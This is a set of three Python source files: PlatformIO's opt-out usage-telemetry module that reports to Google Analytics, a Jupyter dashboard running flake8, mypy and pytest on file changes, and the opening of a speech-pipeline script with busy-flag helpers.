telemetry.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import hashlib
import json
import os
import re
import sys
import threading
from collections import deque
from time import sleep, time
from traceback import format_exc
import click
import requests
from platformio import __version__, app, exception, util
from platformio.commands import PlatformioCLI
from platformio.compat import hashlib_encode_data, string_types
from platformio.proc import is_ci, is_container
from platformio.project.helpers import is_platformio_project
try:
import queue
except ImportError:
import Queue as queue
class TelemetryBase(object):
    """Minimal key/value parameter store shared by telemetry back-ends."""

    def __init__(self):
        # Hit parameters accumulated before sending.
        self._params = {}

    def __getitem__(self, name):
        # A missing parameter reads as None instead of raising KeyError.
        return self._params.get(name, None)

    def __setitem__(self, name, value):
        self._params[name] = value

    def __delitem__(self, name):
        # Deleting an absent parameter is a silent no-op.
        self._params.pop(name, None)

    def send(self, hittype):
        """Concrete back-ends must implement the actual delivery."""
        raise NotImplementedError()
class MeasurementProtocol(TelemetryBase):
    """Builds Google Analytics Measurement Protocol hits for PlatformIO."""

    # Google Analytics tracking id.
    TID = "UA-1768265-9"

    # Friendly names mapped to their Measurement Protocol parameter keys.
    PARAMS_MAP = {
        "screen_name": "cd",
        "event_category": "ec",
        "event_action": "ea",
        "event_label": "el",
        "event_value": "ev",
    }

    def __init__(self):
        super(MeasurementProtocol, self).__init__()
        self["v"] = 1  # protocol version
        self["tid"] = self.TID
        self["cid"] = app.get_cid()
        try:
            # Screen resolution = terminal size; may fail without a TTY.
            self["sr"] = "%dx%d" % click.get_terminal_size()
        except ValueError:
            pass
        self._prefill_screen_name()
        self._prefill_appinfo()
        self._prefill_sysargs()
        self._prefill_custom_data()

    def __getitem__(self, name):
        # Translate friendly names (e.g. "event_action") to GA keys.
        if name in self.PARAMS_MAP:
            name = self.PARAMS_MAP[name]
        return super(MeasurementProtocol, self).__getitem__(name)

    def __setitem__(self, name, value):
        if name in self.PARAMS_MAP:
            name = self.PARAMS_MAP[name]
        super(MeasurementProtocol, self).__setitem__(name, value)

    def _prefill_appinfo(self):
        # Application version and name/user-agent.
        self["av"] = __version__
        self["an"] = app.get_user_agent()

    def _prefill_sysargs(self):
        # Record a sanitized command line: anything that could carry an email,
        # path or escaped data is masked with "***".
        args = []
        for arg in sys.argv[1:]:
            arg = str(arg)
            if arg == "account":  # ignore account cmd which can contain username
                return
            if any(("@" in arg, "/" in arg, "\\" in arg)):
                arg = "***"
            args.append(arg.lower())
        self["cd3"] = " ".join(args)

    def _prefill_custom_data(self):
        def _filter_args(items):
            # Keep items up to and including the one right after "account".
            # NOTE(review): this helper appears unused in this version.
            result = []
            stop = False
            for item in items:
                item = str(item).lower()
                result.append(item)
                if stop:
                    break
                if item == "account":
                    stop = True
            return result

        caller_id = str(app.get_session_var("caller_id"))
        self["cd1"] = util.get_systype()
        # cd4: 1 when driven by a human/known caller, 0 for anonymous CI runs.
        self["cd4"] = (
            1 if (not util.is_ci() and (caller_id or not is_container())) else 0
        )
        if caller_id:
            self["cd5"] = caller_id.lower()

    def _prefill_screen_name(self):
        def _first_arg_from_list(args_, list_):
            for _arg in args_:
                if _arg in list_:
                    return _arg
            return None

        # Collect non-option CLI arguments, lowercased.
        args = []
        for arg in PlatformioCLI.leftover_args:
            if not isinstance(arg, string_types):
                arg = str(arg)
            if not arg.startswith("-"):
                args.append(arg.lower())
        if not args:
            return

        # Default screen name is the first command; known command groups
        # include their sub-command as well.
        cmd_path = args[:1]
        if args[0] in (
            "account",
            "device",
            "platform",
            "package",
            "project",
            "settings",
            "system",
        ):
            cmd_path = args[:2]
        if args[0] == "lib" and len(args) > 1:
            lib_subcmds = (
                "builtin",
                "install",
                "list",
                "register",
                "search",
                "show",
                "stats",
                "uninstall",
                "update",
            )
            sub_cmd = _first_arg_from_list(args[1:], lib_subcmds)
            if sub_cmd:
                cmd_path.append(sub_cmd)
        elif args[0] == "remote" and len(args) > 1:
            remote_subcmds = ("agent", "device", "run", "test")
            sub_cmd = _first_arg_from_list(args[1:], remote_subcmds)
            if sub_cmd:
                cmd_path.append(sub_cmd)
                if len(args) > 2 and sub_cmd in ("agent", "device"):
                    remote2_subcmds = ("list", "start", "monitor")
                    sub_cmd = _first_arg_from_list(args[2:], remote2_subcmds)
                    if sub_cmd:
                        cmd_path.append(sub_cmd)
        self["screen_name"] = " ".join([p.title() for p in cmd_path])

    def _ignore_hit(self):
        # Respect the opt-out setting and skip noisy IDE-data hits.
        if not app.get_setting("enable_telemetry"):
            return True
        if all(c in sys.argv for c in ("run", "idedata")) or self["ea"] == "Idedata":
            return True
        return False

    def send(self, hittype):
        if self._ignore_hit():
            return
        self["t"] = hittype
        # correct queue time
        if "qt" in self._params and isinstance(self["qt"], float):
            self["qt"] = int((time() - self["qt"]) * 1000)
        MPDataPusher().push(self._params)
@util.singleton
class MPDataPusher(object):
    """Singleton background pusher for Measurement Protocol hits."""

    MAX_WORKERS = 5

    def __init__(self):
        self._queue = queue.LifoQueue()
        # Hits that could not be delivered; kept for a later backup/resend.
        self._failedque = deque()
        self._http_session = requests.Session()
        self._http_offline = False
        self._workers = []

    def push(self, item):
        # if network is off-line, stash the hit (with its queue time) instead
        # of feeding workers that cannot deliver it
        if self._http_offline:
            if "qt" not in item:
                item["qt"] = time()
            self._failedque.append(item)
            return
        self._queue.put(item)
        self._tune_workers()

    def in_wait(self):
        # Number of queued hits not yet acknowledged by a worker.
        return self._queue.unfinished_tasks

    def get_items(self):
        # Drain both the failed deque and whatever is still queued.
        items = list(self._failedque)
        try:
            while True:
                items.append(self._queue.get_nowait())
        except queue.Empty:
            pass
        return items

    def _tune_workers(self):
        # Reap dead workers, then start enough new ones to cover the queue,
        # capped at MAX_WORKERS.
        for i, w in enumerate(self._workers):
            if not w.is_alive():
                del self._workers[i]
        need_nums = min(self._queue.qsize(), self.MAX_WORKERS)
        active_nums = len(self._workers)
        if need_nums <= active_nums:
            return
        for i in range(need_nums - active_nums):
            t = threading.Thread(target=self._worker)
            t.daemon = True
            t.start()
            self._workers.append(t)

    def _worker(self):
        while True:
            try:
                item = self._queue.get()
                # Track a copy in the failed deque while sending; it is
                # removed again only on successful delivery.
                _item = item.copy()
                if "qt" not in _item:
                    _item["qt"] = time()
                self._failedque.append(_item)
                if self._send_data(item):
                    self._failedque.remove(_item)
                self._queue.task_done()
            except:  # pylint: disable=W0702
                pass

    def _send_data(self, data):
        if self._http_offline:
            return False
        try:
            r = self._http_session.post(
                "https://ssl.google-analytics.com/collect",
                data=data,
                headers={"User-Agent": app.get_user_agent()},
                timeout=1,
            )
            r.raise_for_status()
            return True
        except requests.exceptions.HTTPError as e:
            # Treat any 4xx client error (e.g. Bad Request) as delivered so
            # the hit is not retried forever.
            # BUG FIX: the original chained comparison
            # `400 >= e.response.status_code < 500` is equivalent to
            # `status <= 400` and never matched the intended 4xx range.
            if 400 <= e.response.status_code < 500:
                return True
        except:  # pylint: disable=W0702
            pass
        # Any other failure flips the pusher into off-line mode.
        self._http_offline = True
        return False
def on_command():
    """Telemetry hook invoked once per CLI command invocation."""
    # Flush hits that failed to send during previous runs first.
    resend_backuped_reports()
    mp = MeasurementProtocol()
    mp.send("screenview")
    if is_ci():
        measure_ci()
def on_exception(e):
    """Report an unexpected exception via telemetry.

    Expected user-side/flow-control errors are ignored; unknown exception
    types are reported as fatal together with a reversed traceback.
    """
    # These exception types are expected and not worth reporting.
    if isinstance(
        e, (IOError, exception.ReturnErrorCode, exception.UserSideException)
    ):
        return
    is_fatal = (
        not isinstance(e, exception.PlatformioException)
        or "Error" in e.__class__.__name__
    )
    if is_fatal:
        details = " ".join(reversed(format_exc().split("\n")))
    else:
        details = str(e)
    description = "%s: %s" % (type(e).__name__, details)
    send_exception(description, is_fatal)
def measure_ci():
    """Send an event identifying which known CI service is running."""
    known_cis = (
        "GITHUB_ACTIONS",
        "TRAVIS",
        "APPVEYOR",
        "GITLAB_CI",
        "CIRCLECI",
        "SHIPPABLE",
        "DRONE",
    )
    # The first CI whose marker environment variable equals "true" wins;
    # otherwise the action stays "NoName".
    action = next(
        (ci for ci in known_cis if os.getenv(ci, "false").lower() == "true"),
        "NoName",
    )
    send_event(category="CI", action=action, label=None)
def dump_run_environment(options):
    """Serialize the non-sensitive subset of a run environment to JSON."""
    # Whitelist of option keys that never carry user-identifying data.
    non_sensitive_data = (
        "platform",
        "platform_packages",
        "framework",
        "board",
        "upload_protocol",
        "check_tool",
        "debug_tool",
        "monitor_filters",
    )
    safe_options = {}
    for key, value in options.items():
        if key in non_sensitive_data:
            safe_options[key] = value
    if is_platformio_project(os.getcwd()):
        # Anonymous project id derived from the client id.
        safe_options["pid"] = hashlib.sha1(
            hashlib_encode_data(app.get_cid())
        ).hexdigest()
    return json.dumps(safe_options, sort_keys=True, ensure_ascii=False)
def send_run_environment(options, targets):
    """Report the (sanitized) run environment as an "Env" event."""
    send_event(
        "Env",
        # Action is the title-cased target list; plain runs report "Run".
        " ".join([t.title() for t in targets or ["run"]]),
        dump_run_environment(options),
    )
def send_event(category, action, label=None, value=None, screen_name=None):
    """Send a Measurement Protocol "event" hit.

    Fields are truncated to the protocol's documented maximum lengths.
    """
    mp = MeasurementProtocol()
    mp["event_category"] = category[:150]
    mp["event_action"] = action[:500]
    if label:
        mp["event_label"] = label[:500]
    if value:
        mp["event_value"] = int(value)
    if screen_name:
        mp["screen_name"] = screen_name[:2048]
    mp.send("event")
def send_exception(description, is_fatal=False):
    """Send an "exception" hit, scrubbing path-like data from *description*."""
    # cleanup sensitive information, such as paths
    description = description.replace("Traceback (most recent call last):", "")
    description = description.replace("\\", "/")
    # Collapse absolute paths down to their last two components.
    # BUG FIX: `re.I | re.M` was passed as the positional `count` argument of
    # re.sub (limiting substitutions to 10 with no flags); pass it as `flags`.
    description = re.sub(
        r'(^|\s+|")(?:[a-z]\:)?((/[^"/]+)+)(\s+|"|$)',
        lambda m: " %s " % os.path.join(*m.group(2).split("/")[-2:]),
        description,
        flags=re.I | re.M,
    )
    description = re.sub(r"\s+", " ", description, flags=re.M)
    mp = MeasurementProtocol()
    mp["exd"] = description[:8192].strip()
    mp["exf"] = 1 if is_fatal else 0
    mp.send("exception")
@atexit.register
def _finalize():
    """At interpreter exit, give in-flight hits up to ~1s to drain, then
    persist whatever is still pending so it can be resent next run."""
    timeout = 1000  # msec
    elapsed = 0
    try:
        while elapsed < timeout:
            if not MPDataPusher().in_wait():
                break
            sleep(0.2)
            elapsed += 200
        backup_reports(MPDataPusher().get_items())
    except KeyboardInterrupt:
        # Never block shutdown on Ctrl-C.
        pass
def backup_reports(items):
    """Persist unsent hits into the application state for a later resend.

    Keeps only the most recent KEEP_MAX_REPORTS entries.
    """
    if not items:
        return
    KEEP_MAX_REPORTS = 100
    tm = app.get_state_item("telemetry", {})
    if "backup" not in tm:
        tm["backup"] = []
    for params in items:
        # skip static options
        for key in list(params.keys()):
            if key in ("v", "tid", "cid", "cd1", "cd2", "sr", "an"):
                del params[key]
        # store time in UNIX format
        if "qt" not in params:
            params["qt"] = time()
        elif not isinstance(params["qt"], float):
            # "qt" was already converted to a millisecond offset; turn it
            # back into an absolute UNIX timestamp.
            params["qt"] = time() - (params["qt"] / 1000)
        tm["backup"].append(params)
    # Keep only the newest KEEP_MAX_REPORTS entries.
    tm["backup"] = tm["backup"][KEEP_MAX_REPORTS * -1 :]
    app.set_state_item("telemetry", tm)
def resend_backuped_reports():
    """Re-queue hits persisted by backup_reports(); returns False when there
    was nothing to resend, True otherwise."""
    tm = app.get_state_item("telemetry", {})
    if "backup" not in tm or not tm["backup"]:
        return False
    for report in tm["backup"]:
        mp = MeasurementProtocol()
        for key, value in report.items():
            mp[key] = value
        # Re-send with the hit type stored in the backed-up report.
        mp.send(report["t"])
    # clean
    tm["backup"] = []
    app.set_state_item("telemetry", tm)
    return True
|
__init__.py | from abc import ABC, abstractmethod
from hashlib import md5
import io
from itertools import chain
import logging as lg
from pathlib import Path
import re
from subprocess import run, PIPE, STDOUT, Popen
from threading import Lock, Thread
from typing import * # noqa
from IPython.display import display
from ipywidgets import HTML, Accordion, HBox, VBox, Widget, Layout, IntProgress,\
Output, Button
from watchdog.events import PatternMatchingEventHandler, FileSystemEvent
from watchdog.observers import Observer
LOG = lg.getLogger(__name__)
def _event_path(event: FileSystemEvent) -> Path:
    """Return the path of the file the watchdog event refers to."""
    return Path(event.src_path)
def _hash(path: Path) -> bytes:
try:
return md5(path.read_bytes()).digest()
except IOError:
return b""
Update = Callable[[Path], None]
class Tracker(PatternMatchingEventHandler):
    """Watchdog handler that calls `update` when a watched file's content
    actually changes (events with an unchanged MD5 hash are suppressed)."""

    def __init__(self, update: Update) -> None:
        super().__init__(
            patterns=["*.py", "*.yml", "*.ini", "*.toml", "*.cfg", "*.json", ".flake8"],
            ignore_patterns=[
                "**/.ipynb_checkpoints/*",
                ".~*",
                "**/__pycache__/*",
                "*.pyc",
                "*.pyd",
                "**/.mypy_cache/**/*"
            ],
            ignore_directories=False
        )
        self._update = update
        # Last-seen content hash per path, used to de-duplicate events.
        self.hashes: Dict[Path, bytes] = {}

    def on_created(self, event: FileSystemEvent) -> None:
        p = _event_path(event)
        LOG.debug(f"Created {p}")
        if p.is_file():
            self._run_update_on_distinct_hash(p, _hash(p))

    def on_deleted(self, event: FileSystemEvent) -> None:
        p = _event_path(event)
        LOG.debug(f"Deleted {p}")
        # A deleted file is represented by the empty hash.
        self._run_update_on_distinct_hash(p, b"")

    def on_moved(self, event: FileSystemEvent) -> None:
        s = Path(event.src_path)
        d = Path(event.dest_path)
        LOG.debug(f"Moved {s} to {d}")
        if d.is_file():
            # A move is a delete of the source plus a create of the target.
            self._run_update_on_distinct_hash(s, b"")
            self._run_update_on_distinct_hash(d, _hash(d))

    def on_modified(self, event: FileSystemEvent) -> None:
        p = _event_path(event)
        LOG.debug(f"Modified {p}")
        if p.is_file():
            self._run_update_on_distinct_hash(p, _hash(p))

    def _run_update_on_distinct_hash(self, path: Path, h: bytes) -> None:
        # Fire the callback only when the content hash actually changed.
        if h != self.hashes.get(path):
            self.hashes[path] = h
            LOG.info(f"Update {path}")
            self._update(path)
class Checker(ABC):
    """Base class for a widget-backed checker whose update work runs in a
    single background thread at a time."""

    def __init__(self):
        # BUG FIX: the original wrote `super().__init__` without calling it —
        # a no-op attribute access instead of initializing the base class.
        super().__init__()
        self.ui = self.init_ui()
        self._lock = Lock()
        self._thread_ = None

    def _ipython_display_(self) -> None:
        # Let Jupyter render the checker by displaying its widget tree.
        display(self.ui)

    @abstractmethod
    def init_ui(self) -> Widget:
        """Build and return the checker's widget tree."""
        ...

    def update(self) -> None:
        # Start a new update thread only when none is currently running.
        with self._lock:
            if self._thread_ is None or not self._thread_.is_alive():
                self._thread_ = Thread(target=self._update)
                self._thread_.start()

    @abstractmethod
    def _update(self) -> None:
        """Perform the actual (potentially slow) check; runs off-thread."""
        ...

    @abstractmethod
    def clear(self) -> None:
        """Reset the checker's displayed state."""
        ...
class TrafficLight(HTML):
    """HTML widget showing a single colored status dot (white = idle)."""

    # BUG FIX: the closing tag was </style>, which does not match the
    # opening <span>; the markup was invalid HTML.
    TEMPLATE = '<span style="font-size: xx-large;">{}</span>'
    LIGHTS = {
        "green": "🟢",
        "red": "🔴",
        "yellow": "🟡",
        "white": "⚪"
    }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.update_value("white")  # start in the not-yet-run state

    def update_value(self, color: str) -> None:
        """Set the dot to *color* (one of the LIGHTS keys)."""
        self.value = TrafficLight.TEMPLATE.format(TrafficLight.LIGHTS[color])

    def green(self) -> None:
        self.update_value("green")

    def yellow(self) -> None:
        self.update_value("yellow")

    def red(self) -> None:
        self.update_value("red")
# One reported problem: (path, lineno, column, issue_lines, tool_message).
Issue = Tuple[str, str, str, List[str], str]
class CheckerLinewise(Checker):
    """Checker whose tool reports one issue per line of output.

    Subclasses provide the command line, a display title, and a parser
    turning the tool's stdout into Issue tuples; results are rendered as
    an HTML table inside an accordion, next to a traffic light.
    """

    # BUG FIX: the return annotation said None although an HBox (a Widget)
    # is returned, contradicting the Checker.init_ui contract.
    def init_ui(self) -> Widget:
        self.trafficlight = TrafficLight(layout=Layout(width="0.5in"))
        self.issues = HTML(value="")
        self.container = Accordion(children=[self.issues])
        self.container.set_title(0, "Yet to update")
        self.container.selected_index = None
        return HBox(children=[self.trafficlight, self.container])

    @property
    @abstractmethod
    def title(self) -> str:
        """Human-readable name shown in the accordion title."""
        ...

    @property
    @abstractmethod
    def command(self) -> List[str]:
        """Command line to execute for this check."""
        ...

    @abstractmethod
    def iter_issues(self, stdout: str) -> Iterator[Issue]:
        """Yield Issue tuples parsed from the tool's *stdout*."""
        ...

    def _update(self) -> None:
        """Run the tool, rebuild the issue table and set the light."""
        self.trafficlight.yellow()
        cp = run(self.command, stdout=PIPE, stderr=STDOUT, encoding="utf-8")
        rows_issues = []
        for path, lineno, column, issue, oops in self.iter_issues(cp.stdout):
            row = ""
            if issue:
                row = (
                    f'<td class="db-cell">{path}</td>'
                    # BUG FIX: a stray doubled quote (at-right"") closed the
                    # class attribute twice, producing malformed HTML.
                    f'<td class="db-cell db-cell-alt at-right">{lineno}</td>'
                    f'<td class="db-cell at-right">{column}</td>'
                    f'<td class="db-cell db-cell-alt">'
                    f'{"".join(f"<div>{x}</div>" for x in issue)}'
                    '</td>'
                )
            elif oops:
                # Tool-level message (crash, usage error): one full-width cell.
                row = f"<td colspan=4>{oops.strip()}</td>"
            if row:
                rows_issues.append(f'<tr>{row}</tr>')
        self.issues.value = (
            '<table cellspacing="0">'
            '<style>'
            '.at-right {'
            'text-align: right;'
            '}'
            '.db-cell {'
            'padding: 0pt 4pt 0pt 4pt;'
            '}'
            '.db-cell-alt {'
            'background: #dc8787;'
            '}'
            '</style>'
            '<thead>'
            '<tr>'
            '<th><div class="db-cell">File</div></th>'
            '<th><div class="db-cell db-cell-alt at-right">Line</div></th>'
            '<th><div class="db-cell at-right">Column</div></th>'
            '<th><div class="db-cell db-cell-alt">Issue</div></th>'
            '</tr>'
            '</thead>'
            '<tbody>'
            f"{''.join(rows_issues)}"
            '</tbody>'
            "</table>"
        )
        if rows_issues:
            self.trafficlight.red()
            self.container.set_title(0, f"{self.title}: {len(rows_issues)} issues")
            self.container.selected_index = 0
        else:
            self.trafficlight.green()
            self.container.set_title(0, f"{self.title}: all good!")
            self.container.selected_index = None

    def clear(self) -> None:
        self.trafficlight.white()
class Flake8(CheckerLinewise):
    """Run flake8 and parse its `path:line:col: message` output lines."""

    @property
    def command(self) -> List[str]:
        return ["flake8"]

    @property
    def title(self) -> str:
        return "PEP8 compliance"

    def iter_issues(self, stdout: str) -> Iterator[Issue]:
        """Yield one Issue per flake8 line; unparseable lines become messages."""
        for raw in stdout.split("\n"):
            try:
                path, lineno, column, message = raw.split(":", maxsplit=3)
            except ValueError:
                # Not in path:line:col:msg form — report it verbatim if non-blank.
                leftover = raw.strip()
                if leftover:
                    yield ("", "", "", [], leftover)
            else:
                message = message.strip()
                if any([path, lineno, column, message]):
                    yield (path, lineno, column, [message], "")
class MyPy(CheckerLinewise):
    # Checker that runs mypy over the project and folds its multi-line
    # error reports (error line + continuation notes) into single issues.

    @property
    def command(self) -> List[str]:
        return ["mypy", "--ignore-missing-imports", "--show-column-numbers", "."]

    @property
    def title(self) -> str:
        return "Type coherence"

    def iter_issues(self, stdout: str) -> Iterator[Issue]:
        """Parse mypy output, merging continuation lines into the pending issue.

        State machine: `path` non-empty means an issue is pending; it is
        flushed when the next error starts, when a non-matching line is
        seen, and once more after the loop for the final issue.
        """
        path = ""
        lineno = ""
        column = ""
        lines_issue: List[str] = []
        for line in stdout.split("\n"):
            if line.startswith("Found "):
                # mypy's trailing "Found N errors..." summary — skip it.
                continue
            elif "error:" in line:
                # A new error starts: flush the previous one, if any.
                if path:
                    yield (path, lineno, column, lines_issue, "")
                # NOTE(review): assumes exactly one "error:" per line; a second
                # occurrence would make this unpacking raise ValueError.
                head, tail = line.split("error:")
                lines_issue = [tail.strip()]
                parts_head = head.split(":")
                # Pad to path:line:col in case the column is missing.
                while len(parts_head) < 3:
                    parts_head.append("")
                path, lineno, column = [part.strip() for part in parts_head[:3]]
            elif ": " in line:
                # Continuation (e.g. "note: ...") — append its message part.
                parts = line.split(": ")
                lines_issue.append(parts[-1].strip())
            else:
                # Anything else ends the pending issue; non-blank leftovers
                # are reported as tool-level messages.
                if path:
                    yield (path, lineno, column, lines_issue, "")
                path = ""
                if line:
                    yield ("", "", "", [], line)
        # Flush the last pending issue after the stream ends.
        if path:
            yield (path, lineno, column, lines_issue, "")
class Pytest(Checker):
    # Checker that runs pytest, tracking live per-test progress and then
    # collecting each failure's output into its own accordion pane.

    def init_ui(self) -> Widget:
        # Progress bar follows the percentage pytest prints in verbose mode.
        self.progress = IntProgress(
            value=0,
            max=100,
            description="<strong>Unit tests</strong>",
            bar_style="info"
        )
        self.failures = Accordion(children=[])
        return VBox(children=[self.progress, self.failures])

    def clear(self) -> None:
        # Only the bar is reset; failure panes are rebuilt on the next run.
        self.progress.value = 0

    def _update(self) -> None:
        """Run pytest, stream progress, then capture failure details."""
        pytest = Popen(
            ["pytest", "-vv", "--color=yes", "--no-header"],
            encoding="utf-8",
            stdout=PIPE,
            stderr=STDOUT
        )
        fails = self._track_progress(cast(io.TextIOBase, pytest.stdout))
        if fails:
            self._capture_failures(cast(io.TextIOBase, pytest.stdout), fails)
        else:
            self.failures.children = [HTML(value="")]
            self.failures.set_title(0, "All tests passed")
        # Drain any remaining output and let the process terminate cleanly.
        pytest.communicate()

    def _track_progress(self, stdout: io.TextIOBase) -> List[str]:
        """Follow the per-test result lines; return the ids of failed tests."""
        self.progress.value = 0
        self.progress.bar_style = "success"
        self.failures.children = [
            HTML(value="Failures will be reported once pytest terminates.")
        ]
        self.failures.set_title(0, "Running pytest")
        self.failures.selected_index = None
        fails: List[str] = []
        # Skip the session header, the "collecting ..." line and a blank line.
        _expect_line(stdout, prefix="====", suffix="====", substr="test session starts")
        _expect_line(stdout, prefix="collecting")
        _expect_empty(stdout)
        for line in stdout:
            line = deansi(line.strip())
            if not line:
                # Blank line ends the per-test section.
                break
            # Trailing column presumably looks like "[ 42%]": characters
            # -5..-3 hold the number — TODO confirm against pytest output.
            self.progress.value = int(line[-5:-2].strip())
            if "FAILED" in line:
                self.progress.bar_style = "danger"
                # First whitespace-separated token is the test id
                # ("path/to/test.py::test_name").
                test, *_ = line.split()
                fails.append(test)
        return fails

    def _capture_failures(self, stdout: Iterator[str], fails: List[str]) -> None:
        """Read the FAILURES section, one Output widget per failed test."""
        _expect_line(stdout, prefix="====", suffix="====", substr="FAILURES")
        children_new: List[Widget] = []
        for i, test in enumerate(fails):
            path_test, name_test = test.split("::")
            _expect_line(stdout, prefix="____", suffix="____", substr=name_test)
            _expect_empty(stdout)
            self.failures.set_title(i, f"{name_test} in {path_test}")
            out = Output()
            for line in stdout:
                line_no_code = deansi(line).strip()
                if any(
                    line_no_code.startswith(sep * 8) and line_no_code.endswith(sep * 8)
                    for sep in ["_", "="]
                ):
                    # Found the header to the next failure or to the final summary.
                    # Push the header line back so the outer loop re-reads it.
                    stdout = chain([line], cast(Iterator[str], stdout))
                    break
                out.append_stdout(line)
            children_new.append(out)
        self.failures.children = children_new
        self.failures.selected_index = 0
def deansi(s: str) -> str:
    """Return *s* with ANSI escape sequences (color codes) removed."""
    ansi_pattern = "\x1b\\[.+?m"
    return re.sub(ansi_pattern, "", s)
def _expect_line(
    stdout: Iterator[str],
    prefix: str = "",
    suffix: str = "",
    substr: str = ""
) -> None:
    """Consume one line from *stdout* and validate its shape.

    The line is right-stripped and ANSI-stripped before checking.

    Raises:
        ValueError: if the line lacks *prefix*, *suffix* or *substr*.
    """
    line = deansi(next(stdout).rstrip())
    # BUG FIX: the error messages used line[:-1], silently dropping the
    # last character of the offending line; report the full line instead.
    if not line.startswith(prefix):
        raise ValueError(f"Line [{line}] does not start with prefix [{prefix}]")
    if not line.endswith(suffix):
        raise ValueError(f"Line [{line}] does not end with suffix [{suffix}]")
    if substr not in line:
        raise ValueError(f"Line [{line}] does not contain substring [{substr}]")
def _expect_empty(stdout) -> None:
line = next(stdout).strip()
if line:
raise ValueError(f"Line [{line[:-1]}] is not empty as expected.")
class Dashboard:
    """Jupyter dashboard combining the flake8, mypy and pytest checkers.

    Watches *dir_project* (default: the current directory) for file changes
    and, while the Auto button is toggled on, re-runs every checker on each
    distinct change. "Run checks now" triggers a manual run.
    """

    def __init__(self, dir_project: Union[Path, str] = ""):
        self._checkers = [Flake8(), MyPy(), Pytest()]
        self._button_auto = Button(description="Auto", button_style="")
        self._button_auto.on_click(self.on_auto)
        self._button_run_now = Button(description="Run checks now")
        self._button_run_now.on_click(self.on_run_now)
        rows = [HBox(children=[self._button_auto, self._button_run_now])]
        rows.extend(checker.ui for checker in self._checkers)
        self._ui = VBox(children=rows)
        # Watch the project tree and forward distinct changes to the checkers.
        self._observer = Observer()
        self._observer.schedule(
            Tracker(self.on_file_changed),
            Path(dir_project or Path.cwd()),
            recursive=True
        )
        self._observer.start()

    def _ipython_display_(self) -> None:
        display(self._ui)

    def on_auto(self, _) -> None:
        # Toggle: empty button_style means auto-run is off, "info" means on.
        current = self._button_auto.button_style
        self._button_auto.button_style = "" if current else "info"

    def on_run_now(self, _) -> None:
        self._update_checkers()

    def on_file_changed(self, path: Path) -> None:
        # Only react to file events while auto mode is enabled.
        if self._button_auto.button_style:
            self._update_checkers()

    def _update_checkers(self) -> None:
        for checker in self._checkers:
            checker.update()
|
_speech_a3__allinone.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import shutil
import queue
import threading
import subprocess
import datetime
import time
import codecs
import glob
import platform
# Host OS name in lower case: 'windows', 'darwin' or 'linux'.
qOS = platform.system().lower() #windows,darwin,linux
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
# Speech API backends for input (STT), translation and output (TTS);
# 'free' by default, switched to the native engine per OS below.
qApiInp = 'free'
qApiTrn = 'free'
qApiOut = 'free'
if (qOS == 'windows'):
    qApiOut = 'winos'
if (qOS == 'darwin'):
    qApiOut = 'macos'
# Language codes: input speech, translation target, text, and spoken output.
qLangInp = 'ja'
qLangTrn = 'en'
qLangTxt = qLangInp
qLangOut = qLangTrn[:2]
# Working directories of the speech pipeline stages (all under temp/).
qPathCtrl = 'temp/a3_0control/'
qPathInp = 'temp/a3_1voice/'
qPathWav = 'temp/a3_2stt_wav/'
qPathSTT = 'temp/a3_3stt_txt/'
qPathTTS = 'temp/a3_5tts_txt/'
qPathTRA = 'temp/a3_6tra_txt/'
qPathPlay = 'temp/a3_7play_voice/'
qPathRec = 'temp/a3_8recorder/'
qPathWork = 'temp/a3_9work/'
# Busy-flag files used as cross-process locks (see qBusySet/qBusyCheck).
qBusyCtrl = qPathWork + 'busy_speechctl.txt'
qBusyInput = qPathWork + 'busy_voice2wav.txt'
qBusySTT = qPathWork + 'busy_sttcore.txt'
qBusyTTS = qPathWork + 'busy_ttscore.txt'
qBusyPlay = qPathWork + 'busy_playvoice.txt'
# Control files through which commands are sent to the helper processes.
qCtrlBgm = 'temp/temp_bgm_control.txt'
qCtrlWeb = 'temp/temp_web_control.txt'
qCtrlChatting = 'temp/temp_chatting.txt'
qCtrlKnowledge = 'temp/temp_knowledge.txt'
qCtrlVision = 'temp/temp_vision.txt'
qCtrlRecognize = 'temp/temp_recognize.txt'
qCtrlTranslate = 'temp/temp_translate.txt'
def qBusySet(file, sw=True):
    """Create or remove a busy-flag file, retrying for up to one second.

    Args:
        file: path of the flag file.
        sw:   True to create the flag (written content 'BUSY'),
              False to remove it.
    """
    if (sw == True):
        chktime = time.time()
        # Retry until the flag file exists or one second has elapsed.
        while (not os.path.exists(file)) and ((time.time() - chktime) < 1):
            try:
                w = open(file, 'w')
                w.write('BUSY')
                w.close()
                w = None
            # BUG FIX: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt.
            except Exception:
                w = None
            time.sleep(0.10)
    else:
        chktime = time.time()
        # Retry until the flag file is gone or one second has elapsed.
        while (os.path.exists(file)) and ((time.time() - chktime) < 1):
            try:
                os.remove(file)
            except Exception:
                pass
            time.sleep(0.10)
def qBusyCheck(file, sec):
    """Wait up to *sec* seconds for the busy-flag *file* to disappear.

    Returns:
        'busy' if the file still exists afterwards, 'none' otherwise.
    """
    deadline = time.time() + sec
    while os.path.exists(file) and (time.time() - (deadline - sec)) < sec:
        time.sleep(0.10)
    return 'busy' if os.path.exists(file) else 'none'
def qMakeDirs(pPath, pRemove=False):
    """Ensure directory *pPath* exists; optionally empty it.

    Args:
        pPath:   directory path ('' is a no-op); backslashes are normalized
                 to forward slashes and a trailing slash is appended.
        pRemove: when True and the directory already exists, delete every
                 entry directly inside it that os.remove can delete
                 (subdirectories are skipped).
    """
    # Removed the commented-out try/except scaffolding that silenced errors.
    if (len(pPath) > 0):
        path = pPath.replace('\\', '/')
        if (path[-1:] != '/'):
            path += '/'
        if (not os.path.isdir(path[:-1])):
            os.makedirs(path[:-1])
        else:
            if (pRemove == True):
                files = glob.glob(path + '*')
                for f in files:
                    try:
                        os.remove(f)
                    # BUG FIX: was a bare `except:`; only swallow ordinary
                    # errors (e.g. f is a directory), not SystemExit.
                    except Exception:
                        pass
